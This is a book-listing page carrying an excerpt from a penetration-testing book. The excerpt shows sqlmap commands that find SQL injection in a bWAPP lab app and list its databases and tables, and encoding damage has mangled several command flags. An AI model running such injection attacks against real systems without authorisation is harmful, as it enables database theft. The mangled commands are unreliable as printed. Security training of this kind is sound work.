Advanced Penetration Testing with Kali Linux by Meel Ummed;
Author:Meel, Ummed;
Language: eng
Format: epub
Publisher: BPB Publications
Figure 6.7: List of all possible SQL injection types
Analyze the target URL for SQL injection vulnerabilities and generate a list of available databases by using the command sqlmap -u <target URL> --random-agent --dbs shown in Figure 6.8:
Command: sqlmap -u http://192.168.29.25/bWAPP/sqli_1.php?title= --cookie="PHPSESSID=q8omhem3kkoi09sfnfo9ukim22;security_level=0" --random-agent âdbs
Figure 6.8: List of available databases
After obtaining the list of databases, display all tables in the selected database by running the command sqlmap -u <target URL> --random-agent -D <database name> --tables as shown in Figure 6.9:
Command: sqlmap -u http://192.168.29.25/bWAPP/sqli_1.php?title= --cookie="PHPSESSID=q8omhem3kkoi09sfnfo9ukim22;security_level=0" --random-agent âD bwapp âtables
Download
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.
Cryptography | Encryption |
Hacking | Network Security |
Privacy & Online Safety | Security Certifications |
Viruses |
Effective Threat Investigation for SOC Analysts by Yahia Mostafa;(6198)
Practical Memory Forensics by Svetlana Ostrovskaya & Oleg Skulkin(5898)
Machine Learning Security Principles by John Paul Mueller(5880)
Attacking and Exploiting Modern Web Applications by Simone Onofri & Donato Onofri(5538)
Operationalizing Threat Intelligence by Kyle Wilhoit & Joseph Opacki(5521)
Solidity Programming Essentials by Ritesh Modi(3836)
Microsoft 365 Security, Compliance, and Identity Administration by Peter Rising(3482)
Mastering Python for Networking and Security by José Manuel Ortega(3318)
Future Crimes by Marc Goodman(3309)
Mastering Azure Security by Mustafa Toroman and Tom Janetscheck(3309)
Blockchain Basics by Daniel Drescher(3272)
Operationalizing Threat Intelligence by Joseph Opacki Kyle Wilhoit(3192)
Learn Computer Forensics - Second Edition by William Oettinger(2989)
Mobile App Reverse Engineering by Abhinav Mishra(2863)
Mastering Bitcoin: Programming the Open Blockchain by Andreas M. Antonopoulos(2837)
The Code Book by Simon Singh(2772)
From CIA to APT: An Introduction to Cyber Security by Edward G. Amoroso & Matthew E. Amoroso(2760)
Incident Response with Threat Intelligence by Roberto Martínez(2681)
The Art Of Deception by Kevin Mitnick(2582)
